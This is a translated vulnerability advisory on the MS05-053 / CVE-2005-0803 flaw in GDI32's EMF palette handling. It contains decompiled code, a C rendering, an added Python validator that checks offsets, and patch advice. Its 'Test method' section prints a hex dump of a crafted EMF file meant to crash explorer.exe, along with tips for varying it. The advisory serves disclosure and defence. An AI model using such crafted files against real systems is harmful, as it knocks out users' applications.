Microsoft Windows Graphics Device Interface Library Denial of Service Vulnerability (MS05-053)
Release date: 2005-03-18
Updated: 2005-11-09
Affected systems:
Microsoft Windows XP SP1
Microsoft Windows Server 2003
Microsoft Windows 2000 SP4
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP1
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Unaffected systems:
Description:
BUGTRAQ ID: 12834
CVE(CAN) ID: CVE-2005-0803
Microsoft Windows is the widely used operating system from Microsoft.
The GetEnhMetaFilePaletteEntries() API in the Windows GDI32.DLL does not handle EMF files correctly, so an application that calls this API may crash when it reads a specially crafted EMF file.
The vulnerable code is as follows:
----------------------------------------------------------
Decompiled GDI32.GetEnhMetaFilePaletteEntries()
----------------------------------------------------------
77F68CC7 PUSH ESI
77F68CC8 PUSH EDI
77F68CC9 PUSH 460000
77F68CCE PUSH DWORD PTR SS:[ESP+10]
77F68CD2 CALL GDI32.77F48A89
77F68CD7 TEST EAX,EAX
77F68CD9 JNZ SHORT GDI32.77F68CE0
77F68CDB OR EAX,FFFFFFFF
77F68CDE JMP SHORT GDI32.77F68D11
77F68CE0 MOV EDI,DWORD PTR SS:[ESP+14]
77F68CE4 TEST EDI,EDI
77F68CE6 JNZ SHORT GDI32.77F68CF0
77F68CE8 MOV EAX,DWORD PTR DS:[EAX+C]
77F68CEB MOV EAX,DWORD PTR DS:[EAX+44]
77F68CEE JMP SHORT GDI32.77F68D11
77F68CF0 MOV ECX,DWORD PTR DS:[EAX+C]
77F68CF3 MOV EAX,DWORD PTR DS:[ECX+44]
77F68CF6 CMP DWORD PTR SS:[ESP+10],EAX
77F68CFA JNB SHORT GDI32.77F68D00
77F68CFC MOV EAX,DWORD PTR SS:[ESP+10]
77F68D00 MOV EDX,DWORD PTR DS:[ECX+30]
77F68D03 ADD EDX,ECX
77F68D05 MOV ECX,EAX
77F68D07 SUB EDX,DWORD PTR DS:[EDX-4]
77F68D0A MOV ESI,DWORD PTR DS:[EDX+C]
77F68D0D ADD ESI,EDX
77F68D0F REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
77F68D11 POP EDI
77F68D12 POP ESI
77F68D13 RETN 0C
-----------------------------------------------------------
Translated to C
-----------------------------------------------------------
UINT GetEnhMetaFilePaletteEntries(
    HENHMETAFILE hemf,   // handle of enhanced metafile
    UINT cEntries,       // count of palette entries
    LPPALETTEENTRY lppe  // address of palette-entry array
)
{
    char *begin, *end, *emreof, *palent;
    DWORD count, size, i;
    // ......
    begin = emf file offset in memory;  // pseudocode: start of the EMF image belonging to hemf
    size = cEntries;
    // get the count of palette entries from the emf file header (ENHMETAHEADER.nPalEntries)
    count = *((DWORD *)(begin + 0x44));
    if (lppe == 0)
        return count;
    if (size > count)
        size = count;
    // find the end of the emf file (ENHMETAHEADER.nBytes, taken from the file without any check)
    end = begin + *((DWORD *)(begin + 0x30));
    // find the offset of emreof (the DWORD just before end is the size of the EMR_EOF record)
    emreof = end - *((DWORD *)(end - 0x04));
    // find the offset of the palette entries (EMR_EOF.offPalEntries, relative to the record)
    palent = emreof + *((DWORD *)(emreof + 0x0c));
    // copy the palette entries from the file to the palette-entry array
    for (i = 0; i < size; i++)
        memcpy(lppe + i, palent + i * 4, 4);
    return size;
}
-----------------------------------------------------------
As can be seen, there is no validity check, so using the offset values read from the EMF (end, emreof, palent) can lead to an invalid memory access.
The concrete impact of this vulnerability depends on the application that uses the API. In general, if EMRHEAD->nPalEntries holds a non-zero value, the application calls this API and passes EMRHEAD->nPalEntries as the second argument. If the address that the crafted EMF makes it access is invalid, the application crashes.
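As an added example that is not part of the original advisory, the following Python code walks the same offset chain as the decompiled routine (nBytes at 0x30, nPalEntries at 0x44, nSizeLast at end-4, offPalEntries at emreof+0x0c) but checks every file-derived offset against the buffer before dereferencing it, which is the validation the GDI32 code lacks. The sample files are constructed inline; HEADER_LEN and the EMR_EOF record type are taken from the public EMF format rather than from the page, and the builder's field layout is an assumption for this demonstration.

```python
import struct
from typing import List, Optional

EMR_EOF = 0x0E      # record type of the EMR_EOF record that carries the palette
HEADER_LEN = 0x58   # size of the original ENHMETAHEADER; covers the fields used here


def _u32(buf: bytes, off: int) -> int:
    """Read a little-endian DWORD, refusing any read that leaves the buffer."""
    if off < 0 or off + 4 > len(buf):
        raise ValueError(f"read at 0x{off:x} is outside the {len(buf)}-byte file")
    return struct.unpack_from("<I", buf, off)[0]


def build_emf(entries: List[bytes], off_pal: Optional[int] = None,
              size_last: Optional[int] = None) -> bytes:
    """Constructed sample: a header plus one EMR_EOF record holding the palette.
    off_pal / size_last override the in-file values to build malformed inputs."""
    eof_size = 16 + 4 * len(entries) + 4          # fixed part + entries + nSizeLast
    hdr = bytearray(HEADER_LEN)
    struct.pack_into("<II", hdr, 0x00, 1, HEADER_LEN)          # iType=EMR_HEADER, nSize
    struct.pack_into("<I", hdr, 0x28, 0x464D4520)              # dSignature " EMF"
    struct.pack_into("<II", hdr, 0x30, HEADER_LEN + eof_size, 1)  # nBytes, nRecords
    struct.pack_into("<I", hdr, 0x44, len(entries))            # nPalEntries
    eof = struct.pack("<IIII", EMR_EOF, eof_size, len(entries),
                      16 if off_pal is None else off_pal)      # offPalEntries
    tail = struct.pack("<I", eof_size if size_last is None else size_last)
    return bytes(hdr) + eof + b"".join(entries) + tail


def get_palette_entries(emf: bytes, c_entries: Optional[int] = None) -> List[bytes]:
    """Hardened counterpart of the decompiled routine; raises ValueError on bad offsets."""
    n_bytes = _u32(emf, 0x30)
    count = _u32(emf, 0x44)
    if n_bytes < HEADER_LEN or n_bytes > len(emf):
        raise ValueError(f"nBytes=0x{n_bytes:x} does not fit the {len(emf)}-byte buffer")
    end = n_bytes
    eof_size = _u32(emf, end - 4)                  # nSizeLast; 0xff010000 in the PoC above
    if eof_size < 20 or eof_size > end - HEADER_LEN:
        raise ValueError(f"nSizeLast=0x{eof_size:x} is not a plausible EMR_EOF size")
    emreof = end - eof_size
    if _u32(emf, emreof) != EMR_EOF or _u32(emf, emreof + 4) != eof_size:
        raise ValueError("record at the computed EMR_EOF offset is not a valid EMR_EOF")
    off_pal = _u32(emf, emreof + 0x0C)
    if c_entries is not None:
        count = min(count, c_entries)
    if off_pal < 16 or emreof + off_pal + 4 * count > end - 4:
        raise ValueError(f"offPalEntries=0x{off_pal:x} with {count} entries leaves the record")
    palent = emreof + off_pal
    return [emf[palent + 4 * i: palent + 4 * i + 4] for i in range(count)]


def is_well_formed(emf: bytes, c_entries: Optional[int] = None) -> bool:
    """True when the palette can be read without any out-of-file access."""
    try:
        get_palette_entries(emf, c_entries)
        return True
    except ValueError:
        return False
```

Feeding the constructed file with nSizeLast set to 0xff010000 (the value in the last DWORD of the test file above) is rejected at the nSizeLast check, whereas the GDI32 routine would subtract it from end and dereference the result.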
<*Source: Hongzhen Zhou (felix__zhou@hotmail.com)
Links: http://marc.theaimsgroup.com/?l=bugtraq&m=111108743527497&w=2
http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
http://www.us-cert.gov/cas/techalerts/TA05-312A.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------
If this does not crash explorer.exe, change the values of the last 8 bytes and test again.
Recommendations:
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* If you use Outlook 2002 or later, read e-mail in plain text format to help protect yourself from the HTML e-mail attack vector.
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS05-053) and the corresponding patch for this issue:
MS05-053:Vulnerabilities in Graphics Rendering Engine Could Allow Code Execution (896424)
Link: http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
